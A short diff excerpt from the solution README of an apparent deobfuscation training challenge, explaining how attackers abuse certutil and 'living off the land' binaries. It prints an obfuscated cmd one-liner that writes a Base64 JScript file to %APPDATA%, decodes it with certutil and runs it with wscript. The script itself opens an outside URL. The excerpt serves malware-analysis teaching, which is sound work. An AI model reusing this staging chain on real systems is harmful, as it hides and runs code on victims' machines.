duckbillsecurity/Deobfuscation-Challenges/challenge001/solution/README.md

 start /MIN cmd %ComSpec% /V/D/c "s^eT IITV=%APPDATA%\%RANDOM%.^j^S&&echo dmFyIENTYUo9IlciKyJzQyIrIlIiOw0KdmFyIERTYUo9ImlQIisidC4iOw0KdmFyIEVTYUo9IlNoIisiRWwiKyJsIjsNCnZhciBGU2FKPSJoIisiVCIrIlQiOw0KdmFyIEdTYUo9InAiKyJzOi8iKyIvIjsNCnZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KENTYUorRFNhSitFU2FKKTsNCnNoZWxsLnJ1bihGU2FKICsgR1NhSiArICJhdHRhY2tuZGVmZW5kLmNvbSIpOw== >!IITV!&&cErtUtil -f -dEco^de !IITV! !IITV!&& w^s^c^r^ipt !IITV!"
 ```

 While certutil is used to manage certificates, the tool can be abused by attackers in quite a few ways including downloading files, and also encoding and decoding files in Base64[^1].
-This technique to use native system tools is referred to as Living off the Land[^2].
+This technique to use native system tools is referred to as LOLBins (living off the land binaries)[^2].

 3. The initial cmd file utilises windows environment variables[^3], as well as setting a new variable to an encoded Base64 file.